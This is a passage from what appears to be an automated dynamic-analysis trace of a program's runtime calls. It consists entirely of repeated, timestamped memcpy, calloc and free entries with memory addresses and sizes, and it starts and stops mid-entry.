_Dst=0x20611c0, _Src=0x2061130, _Size=0x80 | out: _Dst=0x20611c0) returned 0x20611c0 [0062.786] memcpy (in: _Dst=0x20611c0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x20611c0) returned 0x20611c0 [0062.786] calloc (_Count=0x21, _Size=0x4) returned 0x2061250 [0062.786] memcpy (in: _Dst=0x2061250, _Src=0x20611c0, _Size=0x80 | out: _Dst=0x2061250) returned 0x2061250 [0062.786] memcpy (in: _Dst=0x2061250, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0062.786] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.786] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.786] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.786] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.787] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.787] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.787] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.787] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.787] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.787] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.787] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.787] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.787] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.787] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.787] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.787] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.787] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.787] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.787] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.787] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.787] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.787] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.787] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.787] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.787] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.788] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.788] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.788] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.788] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.788] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.788] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.788] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.788] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.788] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.788] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.788] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.788] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.788] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.788] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.788] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0063.480] free (_Block=0x53fef0) [0063.481] free (_Block=0x2060158) [0063.481] free (_Block=0x20601e8) [0063.481] free (_Block=0x2060278) [0063.482] free (_Block=0x2060308) [0063.482] free (_Block=0x2060398) [0063.482] free (_Block=0x2060428) [0063.483] free (_Block=0x20604b8) [0063.483] free (_Block=0x2060548) [0063.483] free (_Block=0x20605d8) [0063.484] free (_Block=0x2060668) [0063.484] free (_Block=0x20606f8) [0063.484] free (_Block=0x2060788) [0063.485] free (_Block=0x2060818) [0063.485] free (_Block=0x20608a8) [0063.485] free (_Block=0x2060950) [0063.485] free (_Block=0x20609e0) [0063.486] free (_Block=0x2060a70) [0063.486] free (_Block=0x2060b00) [0063.487] free (_Block=0x2060b90) [0063.487] free (_Block=0x2060c20) [0063.487] free (_Block=0x2060cb0) [0063.488] free (_Block=0x2060d40) [0063.488] free (_Block=0x2060dd0) [0063.488] free (_Block=0x2060e60) [0063.489] free (_Block=0x2060ef0) [0063.489] free (_Block=0x2060f80) [0063.489] free (_Block=0x2061010) [0063.490] free (_Block=0x20610a0) [0063.498] free (_Block=0x2061130) [0063.498] free (_Block=0x20611c0) [0063.499] free (_Block=0x2061250) [0063.499] free (_Block=0x53fd50) [0063.499] free (_Block=0x53fde0) [0063.499] calloc (_Count=0x40, _Size=0x4) returned 0x53fd50 [0063.499] calloc (_Count=0x40, _Size=0x4) returned 0x53fe58 [0063.499] calloc (_Count=0x20, _Size=0x4) returned 0x53d9e8 [0063.499] calloc (_Count=0x42, _Size=0x4) returned 0x2060158 [0063.499] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.499] calloc (_Count=0x3, _Size=0x4) returned 0x5313e8 [0063.499] calloc (_Count=0x41, _Size=0x4) returned 0x2060268 [0063.500] free (_Block=0x53fe58) [0063.500] calloc (_Count=0x21, _Size=0x4) returned 0x2061250 [0063.500] free (_Block=0x53d9e8) [0063.500] calloc (_Count=0x41, _Size=0x4) returned 0x53fe58 [0063.500] free (_Block=0x2061250) [0063.500] calloc (_Count=0x2, _Size=0x4) returned 0x53ff68 [0063.500] calloc (_Count=0x3, _Size=0x4) returned 0x53ff78 [0063.500] free (_Block=0x5313d8) [0063.500] free (_Block=0x53ff68) [0063.500] calloc (_Count=0x2, _Size=0x4) returned 0x53ff68 [0063.500] free (_Block=0x53ff68) [0063.501] calloc (_Count=0x22, _Size=0x4) returned 0x2061250 [0063.501] free (_Block=0x53ff78) [0063.501] calloc (_Count=0x41, _Size=0x4) returned 0x2060378 [0063.501] free (_Block=0x2061250) [0063.501] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.501] free (_Block=0x5313d8) [0063.501] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.501] free (_Block=0x5313d8) [0063.501] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.501] free (_Block=0x5313d8) [0063.501] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.501] free (_Block=0x5313d8) [0063.501] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.501] free (_Block=0x5313d8) [0063.501] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.502] free (_Block=0x5313d8) [0063.502] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.502] free (_Block=0x5313d8) [0063.502] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.502] free (_Block=0x5313d8) [0063.502] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.502] free (_Block=0x5313d8) [0063.502] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.502] free (_Block=0x5313d8) [0063.502] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.502] free (_Block=0x5313d8) [0063.502] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.502] free (_Block=0x5313d8) [0063.502] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.502] free (_Block=0x5313d8) [0063.502] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.502] free (_Block=0x5313d8) [0063.502] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.502] free (_Block=0x5313d8) [0063.502] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.502] free (_Block=0x5313d8) [0063.503] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.503] free (_Block=0x5313d8) [0063.503] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.503] free (_Block=0x5313d8) [0063.503] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.503] free (_Block=0x5313d8) [0063.503] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.503] free (_Block=0x5313d8) [0063.503] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.503] free (_Block=0x5313d8) [0063.503] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.503] free (_Block=0x5313d8) [0063.503] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.503] free (_Block=0x5313d8) [0063.503] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.503] free (_Block=0x5313d8) [0063.503] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.503] free (_Block=0x5313d8) [0063.503] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.503] free (_Block=0x5313d8) [0063.503] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.504] free (_Block=0x5313d8) [0063.504] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.504] free (_Block=0x5313d8) [0063.504] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.504] free (_Block=0x5313d8) [0063.504] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.504] free (_Block=0x5313d8) [0063.504] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.504] free (_Block=0x5313d8) [0063.504] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.504] free (_Block=0x5313d8) [0063.504] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.504] free (_Block=0x5313d8) [0063.504] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.504] free (_Block=0x5313d8) [0063.504] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.504] free (_Block=0x5313d8) [0063.504] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.504] free (_Block=0x5313d8) [0063.504] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.505] free (_Block=0x5313d8) [0063.505] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.505] free (_Block=0x5313d8) [0063.505] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.505] free (_Block=0x5313d8) [0063.505] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.505] free (_Block=0x5313d8) [0063.505] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.505] free (_Block=0x5313d8) [0063.505] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.505] free (_Block=0x5313d8) [0063.505] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.505] free (_Block=0x5313d8) [0063.505] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.505] free (_Block=0x5313d8) [0063.505] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.505] free (_Block=0x5313d8) [0063.505] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.505] free (_Block=0x5313d8) [0063.505] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.505] free (_Block=0x5313d8) [0063.505] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.506] free (_Block=0x5313d8) [0063.506] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.506] free (_Block=0x5313d8) [0063.506] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.506] free (_Block=0x5313d8) [0063.506] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.506] free (_Block=0x5313d8) [0063.506] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.506] free (_Block=0x5313d8) [0063.506] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.506] free (_Block=0x5313d8) [0063.506] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.506] free (_Block=0x5313d8) [0063.506] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.506] free (_Block=0x5313d8) [0063.506] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.506] free (_Block=0x5313d8) [0063.506] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.506] free (_Block=0x5313d8) [0063.507] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.507] free (_Block=0x5313d8) [0063.507] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.507] free (_Block=0x5313d8) [0063.507] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.507] free (_Block=0x5313d8) [0063.507] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.507] free (_Block=0x5313d8) [0063.508] free (_Block=0x2060268) [0063.509] free (_Block=0x53fe58) [0063.510] free (_Block=0x2060158) [0063.510] free (_Block=0x2060378) [0063.510] free (_Block=0x5313e8) [0063.510] free (_Block=0x53d8d8) [0063.511] free (_Block=0x53d960) [0063.511] free (_Block=0x53fd50) [0063.511] free (_Block=0x53fcc0) [0063.511] free (_Block=0x2060048) [0063.512] calloc (_Count=0x20, _Size=0x4) returned 0x53d960 [0063.512] calloc (_Count=0x20, _Size=0x4) returned 0x53d8d8 [0063.512] calloc (_Count=0x20, _Size=0x4) returned 0x53d9e8 [0063.512] calloc (_Count=0x21, _Size=0x4) returned 0x2061250 [0063.512] free (_Block=0x53d9e8) [0063.512] calloc (_Count=0x21, _Size=0x4) returned 0x20611c0 [0063.512] calloc (_Count=0x42, _Size=0x4) returned 0x53fcc0 [0063.512] calloc (_Count=0x1, _Size=0x4) returned 0x5313d8 [0063.512] calloc (_Count=0x41, _Size=0x4) returned 0x53fdd0 [0063.512] free (_Block=0x5313d8) [0063.512] calloc (_Count=0x41, _Size=0x4) returned 0x2060048 [0063.513] calloc (_Count=0x20, _Size=0x4) returned 0x53d9e8 [0063.513] calloc (_Count=0x43, _Size=0x4) returned 0x2060158 [0063.513] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.513] calloc (_Count=0x3, _Size=0x4) returned 0x5313e8 [0063.513] calloc (_Count=0x21, _Size=0x4) returned 0x2061130 [0063.513] free (_Block=0x53d9e8) [0063.513] calloc (_Count=0x41, _Size=0x4) returned 0x2060270 [0063.513] free (_Block=0x2061130) [0063.513] calloc (_Count=0x2, _Size=0x4) returned 0x53fee0 [0063.513] calloc (_Count=0x3, _Size=0x4) returned 0x53fef0 [0063.513] free (_Block=0x5313d8) [0063.514] free (_Block=0x53fee0) [0063.514] calloc (_Count=0x22, _Size=0x4) returned 0x2061130 [0063.514] free (_Block=0x53fef0) [0063.514] calloc (_Count=0x41, _Size=0x4) returned 0x2060380 [0063.514] free (_Block=0x2061130) [0063.514] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.514] free (_Block=0x5313d8) [0063.514] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.514] free (_Block=0x5313d8) [0063.514] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.514] free (_Block=0x5313d8) [0063.514] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.514] free (_Block=0x5313d8) [0063.514] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.514] free (_Block=0x5313d8) [0063.515] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.515] free (_Block=0x5313d8) [0063.515] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.515] free (_Block=0x5313d8) [0063.515] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.515] free (_Block=0x5313d8) [0063.515] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.515] free (_Block=0x5313d8) [0063.515] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.515] free (_Block=0x5313d8) [0063.515] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.515] free (_Block=0x5313d8) [0063.515] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.515] free (_Block=0x5313d8) [0063.515] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.515] free (_Block=0x5313d8) [0063.515] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.515] free (_Block=0x5313d8) [0063.515] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.515] free (_Block=0x5313d8) [0063.516] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.516] free (_Block=0x5313d8) [0063.516] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.516] free (_Block=0x5313d8) [0063.516] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.516] free (_Block=0x5313d8) [0063.516] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.516] free (_Block=0x5313d8) [0063.516] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.516] free (_Block=0x5313d8) [0063.516] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.516] free (_Block=0x5313d8) [0063.516] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.516] free (_Block=0x5313d8) [0063.516] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.516] free (_Block=0x5313d8) [0063.516] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.516] free (_Block=0x5313d8) [0063.516] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.516] free (_Block=0x5313d8) [0063.516] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.517] free (_Block=0x5313d8) [0063.517] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.517] free (_Block=0x5313d8) [0063.517] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.517] free (_Block=0x5313d8) [0063.517] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.517] free (_Block=0x5313d8) [0063.517] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.517] free (_Block=0x5313d8) [0063.517] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.517] free (_Block=0x5313d8) [0063.517] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.517] free (_Block=0x5313d8) [0063.517] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.517] free (_Block=0x5313d8) [0063.517] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.517] free (_Block=0x5313d8) [0063.517] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.517] free (_Block=0x5313d8) [0063.517] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.518] free (_Block=0x5313d8) [0063.518] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.518] free (_Block=0x5313d8) [0063.518] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.518] free (_Block=0x5313d8) [0063.518] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.518] free (_Block=0x5313d8) [0063.518] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.518] free (_Block=0x5313d8) [0063.518] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.518] free (_Block=0x5313d8) [0063.806] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.806] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.806] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.806] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.806] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.806] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.806] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.806] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.806] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.807] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.807] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.807] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.807] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.807] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.807] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.807] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.807] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.807] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.807] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.807] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.807] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.807] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.807] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.807] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.807] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.807] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.807] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.807] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.807] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.808] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.808] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.808] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.808] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.808] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.808] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.808] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.808] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.808] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.808] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.808] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.808] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.808] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.808] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.808] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.808] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.808] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.808] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.808] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.809] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.809] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.809] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.809] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.809] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.809] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.809] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.809] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.809] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.809] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.809] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0063.809] memcpy (in: 